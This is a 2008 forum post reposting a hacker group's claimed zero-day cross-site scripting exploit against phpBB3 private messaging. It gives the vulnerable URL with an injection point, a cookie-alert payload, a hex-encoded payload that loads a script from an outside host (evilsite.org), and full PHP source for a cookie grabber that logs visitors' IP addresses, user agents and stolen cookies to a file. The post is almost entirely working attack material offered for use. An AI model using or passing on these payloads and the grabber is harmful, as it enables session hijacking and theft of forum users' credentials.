puskin Posted July 13, 2008 Report Posted July 13, 2008 ################################################## #################################### # # # Authors: Dante90, WaRWolFz Crew # # T0T4L, Ex Member Crew # # Title: XSS Private Messagging On PhpBB3 By Dante90 [0-Day & Priv8] # # MSN: [email]dante90.dmc4@hotmail.it[/email] # # Web: [url]www.warwolfz.org[/url] # # Description: XSS (Cross Site Scripting), Grab Status: 100%. # # # ################################################## #################################### XSS Private Messagging On PhpBB3 By Dante90 [0-Day & Priv8] Quote: [url]http://TRAGET/ucp.php?i=pm&mode=compose&action=reply&f=[/url][xss]&p=6779 Where is: Quote: [xss] = '';!--"<script>alert(document.cookie);</script>=&{(alert(1))} Redirect Code [Ascii --> Hex]: Quote: [xss] = %3c%73%63%72%69%70%74%20%73%72%63%3d%68%74%74%70%3 a%2f%2f%77%77%77%2e%65%76%69%6c%73%69%74%65%2e%6f% 72%67%2f%66%69%6c%65%2e%6a%73%3e (<script src=http://www.evilsite.org/WaRWolFz/file.js>) Cookies grabber: Quote: <?php $ip = $_SERVER['REMOTE_ADDR']; $referer = $_SERVER['HTTP_REFERER']; $agent = $_SERVER['HTTP_USER_AGENT']; $data = $_GET['warwolfz']; $time = date("Y-m-d G:i:s A"); $text = "Time: ".$time."\nIP:".$ip."\nReferer:".$referer."\nU ser-Agent:".$agent."\nCookie:".$data."\n\n"; $file = fopen('cookies.html' , 'a'); fwrite($file,$text); fclose($file); ?>credit:http://www.h4cky0u.org Quote
